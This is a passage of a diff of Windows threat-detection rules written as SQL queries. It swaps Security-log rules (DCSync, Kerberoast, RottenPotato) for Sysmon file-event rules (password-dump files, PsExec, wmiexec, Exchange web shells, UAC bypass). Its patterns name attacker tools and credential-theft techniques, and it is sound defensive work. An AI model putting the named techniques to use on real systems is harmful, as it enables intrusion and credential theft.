"filename": "win_security_apt_wocao.yml" + "filename": "file_event_win_script_creation_by_office_using_file_ext.yml" }, { - "title": "Suspicious Scheduled Task Update", - "id": "614cf376-6651-47c4-9dcc-6b9527f749f4", + "title": "Office Macro File Creation From Suspicious Process", + "id": "b1c50487-1967-4315-a026-6491686d860e", "status": "experimental", - "description": "Detects update to a scheduled task event that contain suspicious keywords.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a office macro file from a a suspicious process", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4702' AND (TaskContentNew LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContentNew LIKE '%regsvr32%' ESCAPE '\\' OR TaskContentNew LIKE '%rundll32%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd%' ESCAPE '\\' OR TaskContentNew LIKE '%/c %' ESCAPE '\\' OR TaskContentNew LIKE '%/k %' ESCAPE '\\' OR TaskContentNew LIKE '%/r %' ESCAPE '\\' OR TaskContentNew LIKE '%powershell%' ESCAPE '\\' OR TaskContentNew LIKE '%pwsh%' ESCAPE '\\' OR 
TaskContentNew LIKE '%mshta%' ESCAPE '\\' OR TaskContentNew LIKE '%wscript%' ESCAPE '\\' OR TaskContentNew LIKE '%cscript%' ESCAPE '\\' OR TaskContentNew LIKE '%certutil%' ESCAPE '\\' OR TaskContentNew LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContentNew LIKE '%bash.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%bash %' ESCAPE '\\' OR TaskContentNew LIKE '%scrcons%' ESCAPE '\\' OR TaskContentNew LIKE '%wmic %' ESCAPE '\\' OR TaskContentNew LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%forfiles%' ESCAPE '\\' OR TaskContentNew LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContentNew LIKE '%hh.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\')) AND (TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\'))" ], - "filename": "win_security_susp_scheduled_task_update.yml" + "filename": "file_event_win_office_macro_files_from_susp_process.yml" }, { - "title": "KrbRelayUp Attack Pattern", - "id": "749c9f5e-b353-4b90-a9c1-05243357ca4b", + "title": "Suspicious DotNET CLR Usage Log Artifact", + "id": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", "status": "experimental", - "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", - "author": "@SBousseaden, Florian 
Roth", + "description": "Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.", + "author": "frack113, omkar72, oscd.community, Wojciech Lesicki", "tags": [ - "attack.privilege_escalation", - "attack.credential_access" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND AuthenticationPackageName = 'Kerberos' AND IpAddress = '127.0.0.1' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND TargetUserSid LIKE '%-500' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\UsageLogs\\\\cmstp.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\cscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\mshta.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\msxsl.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\regsvr32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\rundll32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\svchost.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wmic.exe.log' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\MsiExec.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% -Embedding%' ESCAPE '\\' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%Temp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\')))" ], - "filename": "win_security_susp_krbrelayup.yml" + "filename": 
"file_event_win_net_cli_artefact.yml" }, { - "title": "RottenPotato Like Attack Pattern", - "id": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", + "title": "QuarksPwDump Dump File", + "id": "847def9e-924d-4e90-b7c4-5f581395a2b4", "status": "test", - "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", - "author": "@SBousseaden, Florian Roth", + "description": "Detects a dump file written by QuarksPwDump password dumper", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", "attack.credential_access", - "attack.t1557.001" + "attack.t1003.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND TargetUserName = 'ANONYMOUS LOGON' AND WorkstationName = '-' AND IpAddress IN ('127.0.0.1', '::1'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM-%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\')" ], - "filename": "win_security_susp_rottenpotato.yml" + "filename": "file_event_win_hktl_quarkspw_filedump.yml" }, { - "title": "Windows Defender Exclusion Set", - "id": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", + "title": "CVE-2021-26858 Exchange Exploitation", + "id": "b06335b3-55ac-4b41-937e-16b7f5d57dfd", "status": "test", - "description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender", - "author": "@BarryShooshooga", + "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server’s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n", + "author": "Bhabesh 
Raj", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.t1203", + "attack.execution", + "cve.2021.26858" ], "falsepositives": [ - "Intended inclusions by administrator" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4660', '4663') AND ObjectName LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%CacheCleanup.bin' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.LOG' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%cleanup.bin' ESCAPE '\\')))" ], - "filename": "win_security_defender_bypass.yml" + "filename": "file_event_win_cve_2021_26858_msexchange.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - Security", - "id": "4edf51e1-cb83-4e1a-bc39-800e396068e3", + "title": "PSEXEC Remote Execution File Artefact", + "id": "304afd73-55a5-4bb9-8c21-0b1fc84ea9e4", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. 
It gets written to the file system and will be recorded in the USN Journal on the target system", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", + "attack.lateral_movement", + "attack.privilege_escalation", "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1136.002", + "attack.t1543.003", + "attack.t1570", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%clipboard]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\PSEXEC-%' ESCAPE '\\' AND TargetFilename LIKE '%.key' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_clip_services_security.yml" + "filename": "file_event_win_psexec_service_key.yml" }, { - "title": "Mimikatz DC Sync", - "id": "611eab06-a145-4dfa-a295-3ccc5c20f59a", - "status": "experimental", - "description": "Detects Mimikatz DC sync security events", - "author": "Benjamin Delpy, Florian Roth (Nextron Systems), Scott Dermott, Sorina Ionescu", + "title": "GoToAssist Temporary Installation Artefact", + "id": "5d756aee-ad3e-4306-ad95-cb1abec48de2", + "status": "test", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.s0002", - "attack.t1003.006" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Valid DC Sync that is not covered by the filters; please report", - "Local Domain Admin account used for Azure AD Connect" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND (Properties LIKE '%Replicating Directory Changes All%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%9923a32a-3607-11d2-b9be-0000f87a36b2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\') AND AccessMask = '0x100') AND NOT ((SubjectDomainName = 'Window Manager') OR ((SubjectUserName LIKE 'NT AUT%' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\')) OR (SubjectUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\LogMeInInc\\\\GoToAssist Remote Support Expert\\\\%' ESCAPE '\\')" ], - "filename": "win_security_dcsync.yml" + "filename": "file_event_win_gotoopener_artefact.yml" }, { - "title": "Weak Encryption Enabled and Kerberoast", - "id": "f6de9536-0441-4b3f-a646-f4e00f300ffd", - "status": "test", - "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", - "author": "@neu5ron", + "title": "Suspicious ASPX File Drop by Exchange", + "id": "bd1212e5-78da-431e-95fa-c58e3237a8e6", + "status": "experimental", + "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", + "author": "Florian Roth (Nextron Systems), MSTI (query, idea)", "tags": [ - 
"attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4738' AND ((((NewUacValue LIKE '%8___' ESCAPE '\\' OR NewUacValue LIKE '%9___' ESCAPE '\\' OR NewUacValue LIKE '%A___' ESCAPE '\\' OR NewUacValue LIKE '%B___' ESCAPE '\\' OR NewUacValue LIKE '%C___' ESCAPE '\\' OR NewUacValue LIKE '%D___' ESCAPE '\\' OR NewUacValue LIKE '%E___' ESCAPE '\\' OR NewUacValue LIKE '%F___' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8___' ESCAPE '\\' OR OldUacValue LIKE '%9___' ESCAPE '\\' OR OldUacValue LIKE '%A___' ESCAPE '\\' OR OldUacValue LIKE '%B___' ESCAPE '\\' OR OldUacValue LIKE '%C___' ESCAPE '\\' OR OldUacValue LIKE '%D___' ESCAPE '\\' OR OldUacValue LIKE '%E___' ESCAPE '\\' OR OldUacValue LIKE '%F___' ESCAPE '\\'))) OR ((NewUacValue LIKE '%1____' ESCAPE '\\' OR NewUacValue LIKE '%3____' ESCAPE '\\' OR NewUacValue LIKE '%5____' ESCAPE '\\' OR NewUacValue LIKE '%7____' ESCAPE '\\' OR NewUacValue LIKE '%9____' ESCAPE '\\' OR NewUacValue LIKE '%B____' ESCAPE '\\' OR NewUacValue LIKE '%D____' ESCAPE '\\' OR NewUacValue LIKE '%F____' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%1____' ESCAPE '\\' OR OldUacValue LIKE '%3____' ESCAPE '\\' OR OldUacValue LIKE '%5____' ESCAPE '\\' OR OldUacValue LIKE '%7____' ESCAPE '\\' OR OldUacValue LIKE '%9____' ESCAPE '\\' OR OldUacValue LIKE '%B____' ESCAPE '\\' OR OldUacValue LIKE '%D____' ESCAPE '\\' OR OldUacValue LIKE '%F____' ESCAPE '\\')))) OR ((NewUacValue LIKE '%8__' ESCAPE '\\' OR NewUacValue LIKE '%9__' ESCAPE '\\' OR NewUacValue LIKE '%A__' ESCAPE '\\' OR NewUacValue LIKE '%B__' ESCAPE '\\' OR NewUacValue LIKE '%C__' ESCAPE '\\' OR NewUacValue LIKE '%D__' ESCAPE '\\' OR NewUacValue LIKE '%E__' ESCAPE '\\' OR NewUacValue LIKE '%F__' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8__' ESCAPE '\\' OR OldUacValue LIKE '%9__' ESCAPE '\\' OR OldUacValue LIKE '%A__' ESCAPE '\\' OR 
OldUacValue LIKE '%B__' ESCAPE '\\' OR OldUacValue LIKE '%C__' ESCAPE '\\' OR OldUacValue LIKE '%D__' ESCAPE '\\' OR OldUacValue LIKE '%E__' ESCAPE '\\' OR OldUacValue LIKE '%F__' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%FrontEnd\\\\HttpProxy\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\aspnet\\_client\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\'))" ], - "filename": "win_security_alert_enable_weak_encryption.yml" + "filename": "file_event_win_exchange_webshell_drop.yml" }, { - "title": "Denied Access To Remote Desktop", - "id": "8e5c03fa-b7f0-11ea-b242-07e0576828d9", - "status": "test", - "description": "This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.\nOften, this event can be generated by attackers when searching for available windows servers in the network.\n", - "author": "Pushkarev Dmitry", + "title": "Suspicious File Creation In Uncommon AppData Folder", + "id": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", + "status": "experimental", + "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). 
This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.001" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Valid user was not added to RDP group" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4825')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.psm1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\LocalLow\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_not_allowed_rdp_access.yml" + "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml" }, { - "title": "CVE-2023-23397 Exploitation Attempt", - "id": "73c59189-6a6d-4b9f-a748-8f6f9bbed75c", + "title": "Suspicious Executable File Creation", + "id": "74babdd6-a758-4549-9632-26535279e654", "status": "experimental", - "description": "Detects outlook initiating connection to a WebDAV or SMB share, 
which could be a sign of CVE-2023-23397 exploitation.", - "author": "Robert Lee @quantum_cookie", + "description": "Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.initial_access", - "cve.2023.23397" + "attack.defense_evasion", + "attack.t1564" ], "falsepositives": [ - "Searchprotocolhost.exe likes to query these registry keys. To avoid false postives, it's better to filter out those events before they reach the SIEM" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%Services\\\\%' ESCAPE '\\' AND (ObjectName LIKE '%WebClient\\\\NetworkProvider' ESCAPE '\\' OR ObjectName LIKE '%LanmanWorkstation\\\\NetworkProvider' ESCAPE '\\') AND AccessList LIKE '%\\%\\%4416%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%.bat.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$Recycle.Bin.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Documents and Settings.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\MSOCache.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Recovery.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs.exe' ESCAPE '\\')))" ], - "filename": "win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml" + "filename": "file_event_win_susp_executable_creation.yml" }, { - "title": "DPAPI Domain Master Key Backup Attempt", - "id": "39a94fd1-8c9a-4ff6-bf22-c058762f8014", + "title": "UAC Bypass Using MSConfig Token Modification - File", + "id": "41bb431f-56d8-4691-bb56-ed34e390906f", "status": 
"test", - "description": "Detects anyone attempting a backup for the DPAPI Master Key. This events gets generated at the source and not the Domain Controller.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.004" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "If a computer is a member of a domain, DPAPI has a backup mechanism to allow unprotection of the data. Which will trigger this event." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4692')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\')" ], - "filename": "win_security_dpapi_domain_masterkey_backup_attempt.yml" + "filename": "file_event_win_uac_bypass_msconfig_gui.yml" }, { - "title": "Active Directory User Backdoors", - "id": "300bac00-e041-4ee2-9c36-e262656a6ecc", - "status": "test", - "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", - "author": "@neu5ron", + "title": "Wmiexec Default Output File", + "id": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", + "status": "experimental", + "description": "Detects the creation of the default output filename used by the wmiexec tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1098", - "attack.persistence" + "attack.lateral_movement", + "attack.t1047" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4738' AND NOT 
(AllowedToDelegateTo = '-' OR AllowedToDelegateTo = '')) OR ((EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToDelegateTo') OR (EventID = '5136' AND ObjectClass = 'user' AND AttributeLDAPDisplayName = 'servicePrincipalName') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToActOnBehalfOfOtherIdentity'))))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename REGEXP '\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'C:\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'D:\\\\__1\\d{9}\\.\\d{1,7}$'))" ], - "filename": "win_security_alert_ad_user_backdoors.yml" + "filename": "file_event_win_wmiexec_default_filename.yml" }, { - "title": "SCM Database Handle Failure", - "id": "13addce7-47b2-4ca0-a98f-1de964d1d669", - "status": "experimental", - "description": "Detects non-system users failing to get a handle of the SCM database.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "New Shim Database Created in the Default Directory", + "id": "ee63c85c-6d51-4d12-ad09-04e25877a947", + "status": "test", + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.\n", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1010" + "attack.persistence", + "attack.t1547.009" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4656' AND ObjectType LIKE 'SC\\_MANAGER OBJECT' ESCAPE '\\' AND ObjectName = 'ServicesActive' AND AccessMask = '0xf003f') AND NOT (SubjectLogonId = '0x3e4'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND 
TargetFilename LIKE '%.sdb' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\apppatch\\\\Custom\\\\%' ESCAPE '\\')" ], - "filename": "win_security_scm_database_handle_failure.yml" + "filename": "file_event_win_creation_new_shim_database.yml" }, { - "title": "Powerview Add-DomainObjectAcl DCSync AD Extend Right", - "id": "2c99737c-585d-4431-b61a-c911d86ff32f", + "title": "Suspicious Creation with Colorcpl", + "id": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", "status": "experimental", - "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", - "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", + "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.defense_evasion", + "attack.t1564" ], "falsepositives": [ - "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5136' AND AttributeLDAPDisplayName = 'ntSecurityDescriptor' AND (AttributeValue LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT ((ObjectClass IN ('dnsNode', 'dnsZoneScope', 'dnsZone'))))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\colorcpl.exe' ESCAPE '\\' AND NOT (((TargetFilename LIKE '%.icm' ESCAPE '\\' OR TargetFilename LIKE '%.gmmp' ESCAPE '\\' OR TargetFilename LIKE '%.cdmp' ESCAPE '\\' OR TargetFilename LIKE '%.camp' ESCAPE '\\'))))" ], - "filename": "win_security_account_backdoor_dcsync_rights.yml" + "filename": "file_event_win_susp_colorcpl.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - Security", - "id": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", + "title": "BloodHound Collection Files", + "id": "02773bed-83bf-469f-b7ff-e676e7d78bab", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", + "author": "C.J. May", "tags": [ - "attack.defense_evasion", - "attack.t1027", + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Some false positives may arise in some environment and this may require some tuning. 
